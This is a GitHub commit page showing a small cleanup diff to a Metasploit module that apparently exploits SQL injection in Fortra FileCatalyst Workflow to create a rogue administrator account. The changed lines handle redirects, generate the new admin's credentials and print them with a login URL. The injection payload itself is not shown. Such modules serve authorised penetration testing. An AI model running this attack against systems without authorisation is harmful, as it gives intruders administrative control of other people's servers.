Skip to content

Commit 8ad328a

Browse files
h4x-x0rh4x-x0r
committed
Code cleanup
Code cleanup
1 parent ea2b592 commit 8ad328a

File tree

1 file changed

+8
-10
lines changed

1 file changed

+8
-10
lines changed

modules/auxiliary/admin/http/fortra_filecatalyst_workflow_sqli.rb

Lines changed: 8 additions & 10 deletions
Original file line numberDiff line numberDiff line change
@@ -37,7 +37,7 @@ def initialize(info = {})
3737
register_options([
3838
OptString.new('TARGETURI', [true, 'Base path', '/']),
3939
OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', Faker::Internet.username]),
40-
OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alpha(8)]),
40+
OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alphanumeric(16)]),
4141
OptString.new('NEW_EMAIL', [true, 'E-mail to be used when creating a new user with admin privileges', Faker::Internet.email])
4242
])
4343
end
@@ -99,9 +99,8 @@ def run
9999
fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
100100
end
101101

102-
raw_res = res.to_s
103-
if raw_res =~ /^Location:\s*(.+)$/
104-
location_value = ::Regexp.last_match(1).strip
102+
if res.headers['Location']
103+
location_value = res.headers['Location']
105104
print_status("Redirect #1: #{location_value}")
106105
else
107106
fail_with(Failure::UnexpectedReply, 'Location header not found.')
@@ -119,9 +118,8 @@ def run
119118
fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
120119
end
121120

122-
raw_res = res.to_s
123-
if raw_res =~ /^Location:\s*(.+)$/
124-
location_value = ::Regexp.last_match(1).strip
121+
if res.headers['Location']
122+
location_value = res.headers['Location']
125123
print_status("Redirect #2: #{location_value}")
126124
else
127125
fail_with(Failure::UnexpectedReply, 'Location header not found.')
@@ -157,8 +155,8 @@ def run
157155
username = datastore['NEW_USERNAME']
158156
password = Digest::MD5.hexdigest(datastore['NEW_PASSWORD']).upcase
159157
email = datastore['NEW_EMAIL']
160-
firstname = Rex::Text.rand_text_alpha(1..6)
161-
lastname = Rex::Text.rand_text_alpha(1..6)
158+
firstname = Faker::Name.first_name
159+
lastname = Faker::Name.last_name
162160
areacode = rand(100..999)
163161
exchangecode = rand(100..999)
164162
subscribernumber = rand(1000..9999)
@@ -266,7 +264,7 @@ def run
266264
end
267265

268266
print_good("New admin user was successfully injected:\n\t#{datastore['NEW_USERNAME']}:#{datastore['NEW_PASSWORD']}")
269-
print_good("Login at: http://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{datastore['TARGETURI']}workflow/jsp/logon.jsp")
267+
print_good("Login at: #{full_uri(normalize_uri(target_uri, 'workflow/jsp/logon.jsp'))}")
270268
end
271269

272270
end

0 commit comments

Comments
 (0)